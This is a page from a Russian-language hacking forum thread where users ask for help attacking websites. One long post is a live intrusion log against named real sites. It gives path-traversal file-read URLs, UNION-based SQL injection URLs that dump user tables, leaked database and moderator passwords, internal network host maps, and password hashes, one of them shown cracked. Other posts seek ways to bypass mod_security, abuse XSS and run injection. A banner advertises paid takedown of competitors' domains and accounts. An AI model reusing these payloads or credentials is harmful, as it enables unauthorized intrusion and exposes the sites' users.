Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1298 из 1393

1298

Опции темы

Поиск в этой теме

Опции просмотра

#12971

07.05.2010, 13:51

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от oko

Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

ну вот что то такое... хотелось бы не много подробнее про это

Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?

#12972

07.05.2010, 14:11

oko

Познающий

Регистрация: 01.05.2010

Сообщений: 34

Провел на форуме:
118737

Репутация: -5

Цитата:

Сообщение от .Slip

Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?

что можно сделать если у сайта открыт порт 8080 ? сканер пишет критическая уязвимость, вот хочу понять почему и как ей пользоваться

#12973

07.05.2010, 14:45

budden

Участник форума

Регистрация: 26.07.2008

Сообщений: 267

Провел на форуме:
1343031

Репутация: 184

Ничего нельзя сделать.

#12974

07.05.2010, 21:07

~~scorpic393~~

Banned

Регистрация: 05.02.2010

Сообщений: 70

Провел на форуме:
177258

Репутация: 5

попал в админку через скулю типа 1 or 1 =1 --

в админке нет возможности залить шелл, хотя была, но какието уроды, которые там уже побывали раз*бали всё. Но я нашол там локальный инклуд, но на серваке стоит mod_secury который фильтрует и в гете и посте данные типа /etc/passwd, Хотя /etc/hosts - прошол. помогите обойти плиз mod_securuty для локального инклуда плиз.

Параноикам )

#12975

08.05.2010, 01:04

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Параноикам )

Код:

$config['Database']['dbtype'] = 'mysql';

$config['Database']['dbname'] = 'vb3';

$config['Database']['tableprefix'] = 'vb3_';

$config['Database']['technicalemail'] = '';

$config['Database']['force_sql_mode'] = false;


$config['MasterServer']['servername'] = '192.168.1.194';
$config['MasterServer']['port'] = 3306;

$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

$config['MasterServer']['usepconnect'] = 0;


$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;

Версия Linux version 2.4.21-60.ELsmp (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
Локалка/соседы
192.168.1.244 web6.driverguide.com web6
192.168.1.211 web1.driverguide.com web1
192.168.1.212 web2.driverguide.com web2
192.168.1.214 web3.driverguide.com web3
192.168.1.215 web4.driverguide.com web4
192.168.1.243 web5.driverguide.com web5
127.0.0.1 members-images.driverguide.net
192.168.1.219 eml.driverguide.com
192.168.1.244 members.driverguide.com members
192.168.1.244 forums.driverguide.com forums
192.168.1.244 beta.driverguide.com beta
192.168.1.244 list.driverguide.com list
192.168.1.220 db1.driverguide.com db1
192.168.1.219 email.driverguide.net email
192.168.1.211 web1-internal.driverguide.net
192.168.1.212 web2-internal.driverguide.net

http://members.driverguide.com//internal/phpMyAdmin/
пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
http://myupdates.com/internal/admin/
http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
editor:7vr1es1uwzlqI DES
в Форуме 91к юзверов дамп ваше =)
-added-
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
editor:7vr1es1uwzlqI
http://members.driverguide.com//internal/phpMyAdmin/
Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
путь с веба /internal/phpMyAdmin/ но млин
$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

http://myupdates.com/internal/admin/
вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00

Код:

$database = "driverdb__live";	// MySQL database name
$dbuser = "dev";	// MySQL username
$dbpass = "dbd3v";	// MySQL password
$host = "192.168.1.194";	 // MySQL host name
moderatorPassword = "mod123";	// to login as a moderator
$spyPassword = "spy123";	 // to login as a spy (disabled when using XOOPS)

еще кое что откопал
http://myupdates.com/static.php?type...c/.htpasswd%00
http://intranet.icentric.com/
intranet:f68alIucmxrmU
quincy:B7B2pTzqkrdbQ
опять DES
http://blog.driverguide.com/wp-login.php стоит ВП

Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
===
короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguid e_blog.wp_users+/*&action=getinfo

Код:

<title>dev@192.168.1.222 ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>

http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limi t+1,100000/*&action=getinfo
<title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

a1e5555abefe434946e95f0de3fb2787 : Shaaolin
quincy:B7B2pTzqkrdbQ:p51s
http://intranet.icentric.com/
http://myupdates.com/internal/admin/
http://members.driverguide.com/internal/phpMyAdmin/
короче никуда не подошел или фильтр по айпи или хз =\
есть идеи ?
P.S Сорри за много букаф )

#12976

08.05.2010, 13:00

*uNkN0Wn*

Участник форума

Регистрация: 25.03.2009

Сообщений: 149

Провел на форуме:
1739459

Репутация: 116

Отправить сообщение для *uNkN0Wn* с помощью ICQ

Есть XSS. Каким образом можно сделать iframe на всё окно?

#12977

08.05.2010, 13:40

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от *uNkN0Wn*

Есть XSS. Каким образом можно сделать iframe на всё окно?

http://www.htmlbook.ru/html/iframe.html

#12978

08.05.2010, 13:42

*uNkN0Wn*

Участник форума

Регистрация: 25.03.2009

Сообщений: 149

Провел на форуме:
1739459

Репутация: 116

Цитата:

Сообщение от .:[melkiy]:.

http://www.htmlbook.ru/html/iframe.html

Благодарствую

#12979

08.05.2010, 13:53

pelligrim

Познающий

Регистрация: 26.04.2008

Сообщений: 31

Провел на форуме:
31474

Репутация: 53

есть инъекция 4 ветка

http://gay.ks.ua/links.php?catid=32+and+substring(version(),1,1)=4

))

помогите правильно составить запрос, что бы вывод был в ошибке.
или здесь только крутить как слепую?

#12980

08.05.2010, 14:02

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Херсонский гей-портал

Страница 1298 из 1393

1298

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход